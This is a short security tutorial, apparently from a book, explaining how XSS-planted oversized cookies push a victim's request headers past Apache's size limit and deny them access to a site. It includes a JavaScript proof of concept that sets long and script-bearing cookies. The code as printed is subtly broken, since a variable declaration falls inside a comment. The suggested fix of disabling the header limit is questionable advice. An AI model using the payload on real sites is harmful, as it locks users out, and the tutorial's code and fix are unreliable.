In this article, we will take a look at server limit DoS. The web server for the HTTP header has a length limit; for Apache, the default is 8192 bytes. In other words, the maximum size for the Apache HTTP header is 8192 bytes (if it is a request body, the default size limit is 2GB). If an HTTP header that the client sends exceeds this size, the server will return a 4 xx error message; the prompt message is as follows:
Your browser sent a request that this server could not understand. The size of a request header field exceeds the server limit. If the attacker maliciously writes a long cookie to the client through XSS attacks, the client will no longer be able to access any page of the cookie domain before it empties the cookie. This is because the cookie is also sent in the HTTP header, and the web server would think that this is a long abnormal request by default, which will result in a DoS at the client’s end.
The POC code is as follows:
<script language="javascript">
alert(document.cookie);
var metastr = "AAAAAAAAAA"; // 10 A var str = "";
while (str.length < 4000) {
str += metastr;
}
alert(str.length);
document.cookie = "evil3=" + "\<script\>alert(xss)\<\/script\>" + ";expires=Thu, 18-Apr-2019 08:37:43 GMT;";
document.cookie = "evil1=" + str + ";expires=Thu, 18-Apr-2019 08:37:43 GMT;";
document.cookie = "evil2=" + str + ";expires=Thu, 18-Apr-2019 08:37:43 GMT;";
alert(document.cookie);
</script>
A long cookie is written to the client.
To resolve this problem, you need to adjust the configuration parameter limit request field size* of Apache. When this parameter is set to 0, the size of the HTTP header is not limited.
Through the previous description, we learned that the nature of DoS attacks is a kind of resource exhaustion attack, and thus when designing a system, you need to take into account a variety of possible scenarios to avoid the limited resources being maliciously abused, which is a higher requirement for safety design.